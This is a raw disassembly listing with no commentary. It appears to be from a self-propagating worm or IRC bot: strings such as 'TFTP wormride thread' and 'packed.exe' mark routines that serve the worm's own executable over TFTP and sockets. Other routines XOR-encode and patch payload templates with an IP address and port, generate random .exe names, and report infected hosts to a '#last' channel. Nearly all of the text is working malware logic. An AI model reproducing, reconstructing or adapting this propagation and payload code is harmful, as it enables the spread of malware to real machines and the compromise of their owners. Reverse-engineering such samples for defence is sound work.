loc_412242: ; CODE XREF: .text:00412211�j
mov al, [ebp-0DA0h]
mov [ebp-0D6Eh], al
mov al, [ebp-0D98h]
add al, 1
mov [ebp-0D98h], al
mov al, [ebp-0D98h]
mov [ebp-0D6Dh], al
loc_412268: ; CODE XREF: .text:00412240�j
movzx eax, byte ptr [ebp-0DA0h]
shl eax, 8
movzx ecx, byte ptr [ebp-0D98h]
lea eax, [eax+ecx-1]
mov [ebp-0D9Ch], eax
push 0
mov eax, [ebp-0D9Ch]
shl eax, 9
push eax
push dword ptr [ebp-10Ch]
call sub_416B96 ; fseek
add esp, 0Ch
push dword ptr [ebp-10Ch]
push 200h
push 1
lea eax, [ebp-0D6Ch]
push eax
call sub_416B90 ; fread
add esp, 10h
mov [ebp-0D94h], eax
push dword ptr [ebp-0D84h]
lea eax, [ebp-0D80h]
push eax
push 0
mov eax, [ebp-0D94h]
add eax, 4
push eax
lea eax, [ebp-0D70h]
push eax
push dword ptr [ebp-108h]
call ds:dword_417250 ; sendto
cmp dword ptr [ebp-0D94h], 0
jnz loc_412394
mov eax, [ebp-0D9Ch]
shl eax, 9
cmp eax, [ebp-4]
jb loc_412394
mov eax, [ebp-0D7Ch]
mov [ebp-0DA8h], eax
push dword ptr [ebp-0DA8h]
push offset dword_41EB10
call sub_409C9D
pop ecx
pop ecx
mov [ebp-0DA4h], eax
mov eax, [ebp-0DA4h]
cmp eax, [ebp-0DA8h]
jz short loc_412394
push 1
push offset dword_41EB14
call sub_409C88
pop ecx
pop ecx
mov [ebp-0DACh], eax
push 10h
push dword ptr [ebp-0D7Ch]
call ds:dword_41721C ; inet_ntoa
push eax
lea eax, [ebp-11Ch]
push eax
call sub_407A56
add esp, 0Ch
lea eax, [ebp-11Ch]
push eax
mov eax, [ebp-0DACh]
inc eax
push eax
push offset aWormride ; "wormride"
push offset unk_41C730
push offset aLast ; "#last"
call sub_40D4AB
add esp, 14h
loc_412394: ; CODE XREF: .text:004122F2�j
; .text:00412304�j ...
jmp short loc_4123B8
; ---------------------------------------------------------------------------
loc_412396: ; CODE XREF: .text:004121C9�j
; .text:004121D9�j
push dword ptr [ebp-0D84h]
lea eax, [ebp-0D80h]
push eax
push 0
push 9
push offset dword_41C724
push dword ptr [ebp-108h]
call ds:dword_417250 ; sendto
loc_4123B8: ; CODE XREF: .text:00412017�j
; .text:loc_4121BB�j ...
mov eax, [ebp-358h]
cmp dword ptr [eax+4], 0
jz short loc_4123C6
jmp short loc_4123CB
; ---------------------------------------------------------------------------
loc_4123C6: ; CODE XREF: .text:004123C2�j
jmp loc_411F66
; ---------------------------------------------------------------------------
loc_4123CB: ; CODE XREF: .text:004123C4�j
push dword ptr [ebp-10Ch]
call sub_416B82 ; fclose
pop ecx
push dword ptr [ebp-108h]
call ds:dword_417230 ; closesocket
push dword ptr [ebp-358h]
call sub_409763
pop ecx
xor eax, eax
loc_4123F1: ; CODE XREF: .text:00411E18�j
; .text:00411EBD�j ...
pop edi
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4123F6 proc near ; CODE XREF: sub_40A9CF+726�p
; sub_40A9CF+742�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_412410
jmp short locret_412446
; ---------------------------------------------------------------------------
loc_412410: ; CODE XREF: sub_4123F6+16�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aTftpWormrideTh ; "TFTP wormride thread"
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Bh]
neg eax
sbb eax, eax
inc eax
push eax
push [ebp+var_4]
push offset loc_411DC5
call sub_4095A4
add esp, 10h
locret_412446: ; CODE XREF: sub_4123F6+18�j
leave
retn
sub_4123F6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412448 proc near ; CODE XREF: sub_4125DF+88�p
; sub_4125DF+AD�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
jmp short loc_41245A
; ---------------------------------------------------------------------------
loc_412453: ; CODE XREF: sub_412448:loc_41249A�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_41245A: ; CODE XREF: sub_412448+9�j
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_4]
jnb short loc_41249C
and [ebp+var_8], 0
jmp short loc_41246F
; ---------------------------------------------------------------------------
loc_412468: ; CODE XREF: sub_412448:loc_412498�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_41246F: ; CODE XREF: sub_412448+1E�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_C]
jnb short loc_41249A
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
movsx ecx, [ebp+arg_10]
xor eax, ecx
mov ecx, [ebp+arg_8]
add ecx, [ebp+var_8]
movsx ecx, byte ptr [ecx]
cmp eax, ecx
jnz short loc_412498
push 1
pop eax
jmp short locret_41249E
; ---------------------------------------------------------------------------
loc_412498: ; CODE XREF: sub_412448+49�j
jmp short loc_412468
; ---------------------------------------------------------------------------
loc_41249A: ; CODE XREF: sub_412448+2D�j
jmp short loc_412453
; ---------------------------------------------------------------------------
loc_41249C: ; CODE XREF: sub_412448+18�j
xor eax, eax
locret_41249E: ; CODE XREF: sub_412448+4E�j
leave
retn
sub_412448 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4124A0 proc near ; CODE XREF: sub_4125DF+36�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 10h
and [ebp+var_4], 0
and [ebp+var_10], 0
and [ebp+var_8], 0
and [ebp+var_C], 0
cmp [ebp+arg_8], 1
jnz short loc_41250C
cmp [ebp+arg_4], 0B2h
jnb short loc_4124CC
xor eax, eax
jmp locret_4125DD
; ---------------------------------------------------------------------------
loc_4124CC: ; CODE XREF: sub_4124A0+23�j
mov [ebp+var_C], 0B2h
push [ebp+var_C]
push offset dword_41C964
push [ebp+arg_0]
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+arg_0]
add eax, 8Fh
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
add eax, 88h
mov [ebp+var_10], eax
mov eax, [ebp+arg_0]
add eax, 0ACh
mov [ebp+var_8], eax
jmp loc_41259C
; ---------------------------------------------------------------------------
loc_41250C: ; CODE XREF: sub_4124A0+1A�j
cmp [ebp+arg_8], 2
jnz short loc_412554
cmp [ebp+arg_4], 0C6h
jnb short loc_412522
xor eax, eax
jmp locret_4125DD
; ---------------------------------------------------------------------------
loc_412522: ; CODE XREF: sub_4124A0+79�j
mov [ebp+var_C], 0C6h
push [ebp+var_C]
push offset dword_41C89C
push [ebp+arg_0]
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+arg_0]
add eax, 89h
mov [ebp+var_10], eax
mov eax, [ebp+arg_0]
add eax, 0C0h
mov [ebp+var_8], eax
jmp short loc_41259C
; ---------------------------------------------------------------------------
loc_412554: ; CODE XREF: sub_4124A0+70�j
cmp [ebp+arg_4], 0B2h
jnb short loc_412561
xor eax, eax
jmp short locret_4125DD
; ---------------------------------------------------------------------------
loc_412561: ; CODE XREF: sub_4124A0+BB�j
mov [ebp+var_C], 0B2h
push [ebp+var_C]
push offset dword_41C7E8
push [ebp+arg_0]
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+arg_0]
add eax, 86h
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
add eax, 8Dh
mov [ebp+var_10], eax
mov eax, [ebp+arg_0]
add eax, 0ACh
mov [ebp+var_8], eax
loc_41259C: ; CODE XREF: sub_4124A0+67�j
; sub_4124A0+B2�j
cmp [ebp+var_4], 0
jz short loc_4125B0
push [ebp+arg_C]
call ds:dword_417244 ; inet_addr
mov ecx, [ebp+var_4]
mov [ecx], eax
loc_4125B0: ; CODE XREF: sub_4124A0+100�j
cmp [ebp+var_10], 0
jz short loc_4125CC
push [ebp+arg_10]
call sub_416B9C ; atoi
pop ecx
push eax
call ds:dword_417238 ; htons
mov ecx, [ebp+var_10]
mov [ecx], ax
loc_4125CC: ; CODE XREF: sub_4124A0+114�j
cmp [ebp+var_8], 0
jz short loc_4125DA
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_14]
mov [eax], ecx
loc_4125DA: ; CODE XREF: sub_4124A0+130�j
mov eax, [ebp+var_C]
locret_4125DD: ; CODE XREF: sub_4124A0+27�j
; sub_4124A0+7D�j ...
leave
retn
sub_4124A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4125DF proc near ; CODE XREF: .text:004106D4�p
; .text:00410B93�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 1Ch
cmp [ebp+arg_4], 1Ch
jnb short loc_4125F2
xor eax, eax
jmp locret_41271E
; ---------------------------------------------------------------------------
loc_4125F2: ; CODE XREF: sub_4125DF+A�j
mov eax, [ebp+arg_0]
mov [ebp+var_10], eax
mov eax, [ebp+arg_0]
add eax, 1Ch
mov [ebp+var_4], eax
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push 1E4h
push [ebp+var_4]
call sub_4124A0
add esp, 18h
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_41262D
xor eax, eax
jmp locret_41271E
; ---------------------------------------------------------------------------
loc_41262D: ; CODE XREF: sub_4125DF+45�j
push 1Ch
push offset dword_41C7C8
push [ebp+var_10]
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, dword_41CB98
mov [ebp+var_8], eax
jmp short loc_412659
; ---------------------------------------------------------------------------
loc_412649: ; CODE XREF: sub_4125DF+94�j
; sub_4125DF:loc_41269A�j
call sub_410422
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
mov dword_41CB98, eax
loc_412659: ; CODE XREF: sub_4125DF+68�j
push 0
push [ebp+arg_1C]
push [ebp+arg_18]
push 4
lea eax, [ebp+var_8]
push eax
call sub_412448
add esp, 14h
test eax, eax
jz short loc_412675
jmp short loc_412649
; ---------------------------------------------------------------------------
loc_412675: ; CODE XREF: sub_4125DF+92�j
mov eax, [ebp+var_14]
xor eax, [ebp+var_8]
mov [ebp+var_1C], eax
push 0
push [ebp+arg_1C]
push [ebp+arg_18]
push 4
lea eax, [ebp+var_1C]
push eax
call sub_412448
add esp, 14h
test eax, eax
jnz short loc_41269A
jmp short loc_41269C
; ---------------------------------------------------------------------------
loc_41269A: ; CODE XREF: sub_4125DF+B7�j
jmp short loc_412649
; ---------------------------------------------------------------------------
loc_41269C: ; CODE XREF: sub_4125DF+B9�j
mov eax, [ebp+var_10]
mov ecx, [ebp+var_8]
mov [eax+3], ecx
mov eax, [ebp+var_10]
mov ecx, [ebp+var_1C]
mov [eax+9], ecx
mov al, byte_41CB95
mov byte ptr [ebp+var_C], al
jmp short loc_4126C8
; ---------------------------------------------------------------------------
loc_4126B8: ; CODE XREF: sub_4125DF+104�j
call sub_410461
mov byte ptr [ebp+var_C], al
mov al, byte ptr [ebp+var_C]
mov byte_41CB95, al
loc_4126C8: ; CODE XREF: sub_4125DF+D7�j
push [ebp+var_C]
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+var_14]
push [ebp+var_4]
call sub_412448
add esp, 14h
test eax, eax
jz short loc_4126E5
jmp short loc_4126B8
; ---------------------------------------------------------------------------
loc_4126E5: ; CODE XREF: sub_4125DF+102�j
mov eax, [ebp+var_10]
mov cl, byte ptr [ebp+var_C]
mov [eax+12h], cl
and [ebp+var_18], 0
jmp short loc_4126FB
; ---------------------------------------------------------------------------
loc_4126F4: ; CODE XREF: sub_4125DF+137�j
mov eax, [ebp+var_18]
inc eax
mov [ebp+var_18], eax
loc_4126FB: ; CODE XREF: sub_4125DF+113�j
mov eax, [ebp+var_18]
cmp eax, [ebp+var_14]
jnb short loc_412718
mov eax, [ebp+var_4]
add eax, [ebp+var_18]
mov al, [eax]
xor al, byte ptr [ebp+var_C]
mov ecx, [ebp+var_4]
add ecx, [ebp+var_18]
mov [ecx], al
jmp short loc_4126F4
; ---------------------------------------------------------------------------
loc_412718: ; CODE XREF: sub_4125DF+122�j
mov eax, [ebp+var_14]
add eax, 1Ch
locret_41271E: ; CODE XREF: sub_4125DF+E�j
; sub_4125DF+49�j
leave
retn
sub_4125DF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412720 proc near ; CODE XREF: sub_412A3A+C�p
; sub_412BC9+DF�p ...
var_194 = dword ptr -194h
var_190 = dword ptr -190h
var_18C = byte ptr -18Ch
var_E4 = byte ptr -0E4h
var_10 = byte ptr -10h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 194h
push 8
push 4
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_194], eax
and [ebp+var_190], 0
loc_412741: ; CODE XREF: sub_412720:loc_41278A�j
push 7Ah
push 61h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+var_190]
mov [ebp+ecx+var_10], al
mov eax, [ebp+var_190]
inc eax
mov [ebp+var_190], eax
mov eax, [ebp+var_190]
cmp eax, [ebp+var_194]
jnz short loc_41278A
push offset a_exe ; ".exe"
mov eax, [ebp+var_190]
lea eax, [ebp+eax+var_10]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_41278C
; ---------------------------------------------------------------------------
loc_41278A: ; CODE XREF: sub_412720+4F�j
jmp short loc_412741
; ---------------------------------------------------------------------------
loc_41278C: ; CODE XREF: sub_412720+68�j
push 17Ch
push offset dword_41CA18
lea eax, [ebp+var_18C]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_E4]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
push 17Ch
lea eax, [ebp+var_18C]
push eax
push [ebp+arg_0]
call sub_4053BF
add esp, 0Ch
leave
retn
sub_412720 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4127D0 proc near ; CODE XREF: sub_412A3A+14D�p
; sub_412BC9+133�p ...
var_24C = byte ptr -24Ch
var_22C = byte ptr -22Ch
var_20C = dword ptr -20Ch
var_208 = byte ptr -208h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 24Ch
cmp dword_41EB1C, 0
jnz loc_4128A0
mov dword_41EB1C, 1
and [ebp+var_20C], 0
jmp short loc_412806
; ---------------------------------------------------------------------------
loc_4127F9: ; CODE XREF: sub_4127D0:loc_41289B�j
mov eax, [ebp+var_20C]
inc eax
mov [ebp+var_20C], eax
loc_412806: ; CODE XREF: sub_4127D0+27�j
mov eax, [ebp+var_20C]
imul eax, 0Ch
cmp off_41DA68[eax], 0
jz loc_4128A0
push 20h
mov eax, [ebp+var_20C]
imul eax, 0Ch
push off_41DA68[eax]
lea eax, [ebp+var_22C]
push eax
call sub_407A56
add esp, 0Ch
push 20h
mov eax, [ebp+var_20C]
imul eax, 0Ch
push off_41CBA0[eax]
lea eax, [ebp+var_24C]
push eax
call sub_407A56
add esp, 0Ch
lea eax, [ebp+var_22C]
push eax
call sub_4105AD
pop ecx
lea eax, [ebp+var_24C]
push eax
call sub_4105AD
pop ecx
lea eax, [ebp+var_24C]
push eax
lea eax, [ebp+var_22C]
push eax
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_41289B
mov dword_41EB20, 1
jmp short loc_4128A0
; ---------------------------------------------------------------------------
loc_41289B: ; CODE XREF: sub_4127D0+BD�j
jmp loc_4127F9
; ---------------------------------------------------------------------------
loc_4128A0: ; CODE XREF: sub_4127D0+10�j
; sub_4127D0+46�j ...
cmp dword_41EB20, 0
jz short loc_4128AE
push 1
pop eax
jmp short locret_412917
; ---------------------------------------------------------------------------
loc_4128AE: ; CODE XREF: sub_4127D0+D7�j
push offset aRb ; "rb"
push offset aPacked_exe_0 ; "packed.exe"
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_4128CC
xor eax, eax
jmp short locret_412917
; ---------------------------------------------------------------------------
loc_4128CC: ; CODE XREF: sub_4127D0+F6�j
and [ebp+var_4], 0
loc_4128D0: ; CODE XREF: sub_4127D0+145�j
push [ebp+var_8]
push 200h
push 1
lea eax, [ebp+var_208]
push eax
call sub_416B90 ; fread
add esp, 10h
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_412900
push [ebp+var_8]
call sub_416B82 ; fclose
pop ecx
push 1
pop eax
jmp short locret_412917
; ---------------------------------------------------------------------------
loc_412900: ; CODE XREF: sub_4127D0+120�j
push [ebp+var_4]
lea eax, [ebp+var_208]
push eax
push [ebp+arg_0]
call sub_4053BF
add esp, 0Ch
jmp short loc_4128D0
; ---------------------------------------------------------------------------
locret_412917: ; CODE XREF: sub_4127D0+DC�j
; sub_4127D0+FA�j ...
leave
retn
sub_4127D0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412919 proc near ; CODE XREF: sub_412BC9+E8�p
; .text:00412D6E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push 0EA60h
push [ebp+arg_0]
call sub_40546E
pop ecx
pop ecx
test eax, eax
jnz short loc_412938
xor eax, eax
jmp short locret_41294C
; ---------------------------------------------------------------------------
loc_412938: ; CODE XREF: sub_412919+19�j
push 0
push 4
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call ds:dword_417248 ; recv
mov eax, [ebp+var_4]
locret_41294C: ; CODE XREF: sub_412919+1D�j
leave
retn
sub_412919 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41294E proc near ; CODE XREF: sub_412BC9+115�p
; .text:00412D91�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
and [ebp+var_8], 0
jmp short loc_412964
; ---------------------------------------------------------------------------
loc_41295D: ; CODE XREF: sub_41294E:loc_4129C3�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_412964: ; CODE XREF: sub_41294E+D�j
mov eax, [ebp+var_8]
imul eax, 3Ah
cmp off_41CCFE[eax], 0
jz short loc_4129C5
mov eax, [ebp+var_8]
imul eax, 3Ah
mov eax, dword_41CCF6[eax]
cmp eax, [ebp+arg_0]
jnz short loc_4129C3
mov eax, [ebp+var_8]
imul eax, 3Ah
add eax, offset aJeP ; "†…Øݯ"
mov [ebp+var_4], eax
push 3Ah
mov eax, [ebp+var_8]
imul eax, 3Ah
add eax, offset aJeP ; "†…Øݯ"
push eax
push [ebp+arg_4]
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_4]
call sub_4105FB
pop ecx
mov eax, [ebp+arg_4]
add eax, 13h
push eax
call sub_4105FB
pop ecx
jmp short loc_4129C5
; ---------------------------------------------------------------------------
loc_4129C3: ; CODE XREF: sub_41294E+34�j
jmp short loc_41295D
; ---------------------------------------------------------------------------
loc_4129C5: ; CODE XREF: sub_41294E+23�j
; sub_41294E+73�j
mov eax, [ebp+var_4]
leave
retn
sub_41294E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4129CA proc near ; CODE XREF: sub_412A3A+16B�p
; sub_412BC9+15A�p ...
var_104 = dword ptr -104h
var_100 = byte ptr -100h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 104h
push 1
mov eax, [ebp+arg_0]
add eax, 2Ah
push eax
call sub_409C88
pop ecx
pop ecx
mov [ebp+var_104], eax
lea eax, [ebp+var_100]
push eax
push [ebp+arg_8]
call sub_4044F7
pop ecx
pop ecx
test eax, eax
jnz short loc_412A11
push offset aUnknown_0 ; "unknown"
lea eax, [ebp+var_100]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_412A11: ; CODE XREF: sub_4129CA+32�j
lea eax, [ebp+var_100]
push eax
mov eax, [ebp+var_104]
inc eax
push eax
push [ebp+arg_C]
push [ebp+arg_4]
push offset dword_41A1D0
push offset aLast ; "#last"
call sub_40D4AB
add esp, 18h
leave
retn
sub_4129CA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412A3A proc near ; CODE XREF: .text:00413466�p
var_250 = dword ptr -250h
var_24C = dword ptr -24Ch
var_248 = byte ptr -248h
var_235 = byte ptr -235h
var_222 = dword ptr -222h
var_20C = dword ptr -20Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 250h
push [ebp+arg_4]
call sub_412720
pop ecx
push 3Ah
push [ebp+arg_0]
lea eax, [ebp+var_248]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_248]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_235]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_20C+3]
mov [ebp+var_8], eax
push 203h
push 0
lea eax, [ebp+var_20C]
push eax
call sub_416B6A ; memset
add esp, 0Ch
and [ebp+var_4], 0
jmp short loc_412AA6
; ---------------------------------------------------------------------------
loc_412A9F: ; CODE XREF: sub_412A3A+8A�j
; sub_412A3A:loc_412B7F�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_412AA6: ; CODE XREF: sub_412A3A+63�j
cmp [ebp+var_4], 3Ch
jnz short loc_412AB1
jmp locret_412BC7
; ---------------------------------------------------------------------------
loc_412AB1: ; CODE XREF: sub_412A3A+70�j
push 3E8h
push [ebp+arg_4]
call sub_40546E
pop ecx
pop ecx
test eax, eax
jnz short loc_412AC6
jmp short loc_412A9F
; ---------------------------------------------------------------------------
loc_412AC6: ; CODE XREF: sub_412A3A+88�j
push 200h
push [ebp+var_8]
push [ebp+arg_4]
call sub_4053DC
add esp, 0Ch
mov [ebp+var_24C], eax
cmp [ebp+var_24C], 0FFFFFFFFh
jnz short loc_412AED
jmp locret_412BC7
; ---------------------------------------------------------------------------
loc_412AED: ; CODE XREF: sub_412A3A+AC�j
cmp [ebp+var_24C], 0
jz short loc_412B69
and [ebp+var_250], 0
jmp short loc_412B0C
; ---------------------------------------------------------------------------
loc_412AFF: ; CODE XREF: sub_412A3A:loc_412B34�j
mov eax, [ebp+var_250]
inc eax
mov [ebp+var_250], eax
loc_412B0C: ; CODE XREF: sub_412A3A+C3�j
mov eax, [ebp+var_250]
cmp eax, [ebp+var_24C]
jnb short loc_412B36
mov eax, [ebp+var_250]
mov eax, [ebp+eax+var_20C]
cmp eax, [ebp+var_222]
jnz short loc_412B34
jmp loc_412BC5
; ---------------------------------------------------------------------------
loc_412B34: ; CODE XREF: sub_412A3A+F3�j
jmp short loc_412AFF
; ---------------------------------------------------------------------------
loc_412B36: ; CODE XREF: sub_412A3A+DE�j
push 3
mov eax, [ebp+var_24C]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-3]
push eax
lea eax, [ebp+var_20C]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 200h
push 0
push [ebp+var_8]
call sub_416B6A ; memset
add esp, 0Ch
jmp short loc_412B7F
; ---------------------------------------------------------------------------
loc_412B69: ; CODE XREF: sub_412A3A+BA�j
push 203h
push 0
lea eax, [ebp+var_20C]
push eax
call sub_416B6A ; memset
add esp, 0Ch
loc_412B7F: ; CODE XREF: sub_412A3A+12D�j
jmp loc_412A9F
; ---------------------------------------------------------------------------
loc_412B84: ; CODE XREF: sub_412A3A:loc_412BC5�j
push [ebp+arg_4]
call sub_4127D0
pop ecx
test eax, eax
jnz short loc_412B93
jmp short locret_412BC7
; ---------------------------------------------------------------------------
loc_412B93: ; CODE XREF: sub_412A3A+155�j
push offset dword_41CC64
push [ebp+arg_4]
lea eax, [ebp+var_248]
push eax
push [ebp+arg_0]
call sub_4129CA
add esp, 10h
push 1
push [ebp+arg_4]
call ds:dword_417200 ; shutdown
push 3E8h
call ds:dword_41709C ; Sleep
jmp short locret_412BC7
; ---------------------------------------------------------------------------
loc_412BC5: ; CODE XREF: sub_412A3A+F5�j
jmp short loc_412B84
; ---------------------------------------------------------------------------
locret_412BC7: ; CODE XREF: sub_412A3A+72�j
; sub_412A3A+AE�j ...
leave
retn
sub_412A3A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412BC9 proc near ; CODE XREF: .text:00413483�p
var_85C = dword ptr -85Ch
var_858 = dword ptr -858h
var_854 = dword ptr -854h
var_850 = dword ptr -850h
var_84C = byte ptr -84Ch
var_810 = dword ptr -810h
var_80C = dword ptr -80Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 85Ch
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_404FE7
add esp, 0Ch
mov [ebp+var_8], eax
mov [ebp+var_854], 3Ch
and [ebp+var_850], 0
and [ebp+var_810], 0
loc_412BFD: ; CODE XREF: sub_412BC9+A9�j
and [ebp+var_85C], 0
jmp short loc_412C13
; ---------------------------------------------------------------------------
loc_412C06: ; CODE XREF: sub_412BC9:loc_412C35�j
mov eax, [ebp+var_85C]
inc eax
mov [ebp+var_85C], eax
loc_412C13: ; CODE XREF: sub_412BC9+3B�j
mov eax, [ebp+var_85C]
cmp eax, [ebp+var_810]
jnb short loc_412C37
mov eax, [ebp+var_85C]
mov eax, [ebp+eax*4+var_80C]
cmp eax, [ebp+var_8]
jnz short loc_412C35
jmp short loc_412C37
; ---------------------------------------------------------------------------
loc_412C35: ; CODE XREF: sub_412BC9+68�j
jmp short loc_412C06
; ---------------------------------------------------------------------------
loc_412C37: ; CODE XREF: sub_412BC9+56�j
; sub_412BC9+6A�j
mov eax, [ebp+var_85C]
cmp eax, [ebp+var_810]
jnz short loc_412C6E
cmp [ebp+var_810], 200h
jnb short loc_412C6E
mov eax, [ebp+var_85C]
mov ecx, [ebp+var_8]
mov [ebp+eax*4+var_80C], ecx
mov eax, [ebp+var_810]
inc eax
mov [ebp+var_810], eax
loc_412C6E: ; CODE XREF: sub_412BC9+7A�j
; sub_412BC9+86�j
xor eax, eax
test eax, eax
jnz short loc_412BFD
lea eax, [ebp+var_854]
push eax
push 0
lea eax, [ebp+var_810]
push eax
push 0
push 0
call ds:dword_41722C ; select
mov [ebp+var_C], eax
cmp [ebp+var_C], 1
jz short loc_412CA5
push [ebp+var_8]
call sub_4053B1
pop ecx
jmp locret_412D4A
; ---------------------------------------------------------------------------
loc_412CA5: ; CODE XREF: sub_412BC9+CC�j
push [ebp+var_8]
call sub_412720
pop ecx
push [ebp+var_8]
call sub_412919
pop ecx
mov [ebp+var_858], eax
cmp [ebp+var_858], 0
jnz short loc_412CD1
push [ebp+var_8]
call sub_4053B1
pop ecx
jmp short locret_412D4A
; ---------------------------------------------------------------------------
loc_412CD1: ; CODE XREF: sub_412BC9+FB�j
lea eax, [ebp+var_84C]
push eax
push [ebp+var_858]
call sub_41294E
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_412CF9
push [ebp+var_8]
call sub_4053B1
pop ecx
jmp short locret_412D4A
; ---------------------------------------------------------------------------
loc_412CF9: ; CODE XREF: sub_412BC9+123�j
push [ebp+var_8]
call sub_4127D0
pop ecx
test eax, eax
jnz short loc_412D11
push [ebp+var_8]
call sub_4053B1
pop ecx
jmp short locret_412D4A
; ---------------------------------------------------------------------------
loc_412D11: ; CODE XREF: sub_412BC9+13B�j
push offset dword_41CC68
push [ebp+var_8]
lea eax, [ebp+var_84C]
push eax
push [ebp+var_4]
call sub_4129CA
add esp, 10h
push 1
push [ebp+var_8]
call ds:dword_417200 ; shutdown
push 3E8h
call ds:dword_41709C ; Sleep
push [ebp+var_8]
call sub_4053B1
pop ecx
locret_412D4A: ; CODE XREF: sub_412BC9+D7�j
; sub_412BC9+106�j ...
leave
retn
sub_412BC9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412D4C proc near ; CODE XREF: .text:loc_413420�p
push ebp
mov ebp, esp
mov eax, offset dword_41EB24
pop ebp
retn
sub_412D4C endp
; ---------------------------------------------------------------------------
loc_412D56: ; DATA XREF: .text:00412ECE�o
push ebp
mov ebp, esp
sub esp, 48h
mov eax, [ebp+8]
mov [ebp-8], eax
push dword ptr [ebp-8]
call sub_412720
pop ecx
